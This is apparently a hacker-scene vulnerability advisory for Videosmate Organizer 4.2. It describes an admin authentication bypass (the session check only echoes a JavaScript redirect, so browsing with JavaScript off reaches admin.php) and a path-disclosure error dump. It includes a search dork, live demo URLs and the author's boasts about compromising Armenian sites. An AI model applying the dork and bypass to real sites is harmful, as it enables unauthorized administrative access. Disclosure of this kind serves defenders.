=====================================================================
    Vulnerable software: Videosmate Organizer V 4.2 (all versions)
    Vendor: http://videosmate.com/
    Software License: Commercial
    Vulns: Authentication Bypass & Path Disclosure
    Risk: Critical
    Dork: intext:Powered by Videosmate Organizer
    =====================================================================
    Vuln Description:
    As i noted above this script is commercial and that's why today i'm unable(may be lazy) to show you whereis vulnerability.
    I discovered this vulnerability while owning armenian sites.
    Flaw in that if the remote user is not authenticated against admin panel ( somesite.tld/sitedb/admin/ )
    it seems script (after session checking thing) is unable to properly kill it's execution.
    Since i have no access to source code of this script i'll try to imagine how this process goes:
     
     
    Suppose:
     
    <?php
    session_start();
     
    if (!isset($_SESSION['am_i_admin_or_am_i_logged_in_admin'])) echo "<script>self.location='login.php';</script>";
     
    /*
    Notice:
    echo 'JS_REDIRECTION';
     **        not  **
    die('JS_REDIRECTION');
    */
     
     
     
     
     
    /****** PWNED ********/
    //YOU ARE ADMIN HERE//
    ?>
     
     
    Exploitation is simple like 2x2:
     
    Disable javascript in your browser and follow to: site.tld/sitedb/admin/admin.php
    (If you wonder then press CTRL+U you will see somethink like:
     
    <script> self.location='login.php';</script>
    <script> self.location='login.php';</script>
    )
     
     
     
    Demo: http://www.videosmate.com/componentdemo/sitedb/admin/admin.php          (<=Disable javascript in your browser or use  NoScript then surf there)
     
     
     
    This is not end!! 111))
     
    PATH DISCLOSURE: Direct access to:
    site.tld/componentdemo/include/categoryfuncs.php
     
    Demo:
    http://www.videosmate.com/componentdemo/include/categoryfuncs.php
     
     
    Warning: include(./settings/conf.php) [function.include]: failed to open stream: No such file or directory in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7
     
    Warning: include(./settings/conf.php) [function.include]: failed to open stream: No such file or directory in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7
     
    Warning: include() [function.include]: Failed opening './settings/conf.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 7
     
    Warning: mysql_query() [function.mysql-query]: Access denied for user 'alphonse'@'localhost' (using password: NO) in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 14
     
    Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/alphonse/public_html/videosmate.com/componentdemo/include/categoryfuncs.php on line 14
    Error, query failed
     
     
     
     
    Please note that: I'm not responsible for any damage if the target site !='.am' domain xD))
     
     
    =====================================================================
     
    SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
    =====================================================================
    packetstormsecurity.org
    packetstormsecurity.com
    packetstormsecurity.net
    securityfocus.com
    cxsecurity.com
    security.nnov.ru
    securtiyvulns.com
    securitylab.ru
    secunia.com
    securityhome.eu
    exploitsdownload.com
    exploit-db.com
    osvdb.com
    websecurity.com.ua
     
    to all Aa Team + to all Azerbaijan Black HatZ +
          *Especially to my bro CAMOUFL4G3 *
    Also special thanks to: ottoman38 & HERO_AZE
    =====================================================================
     
    /AkaStep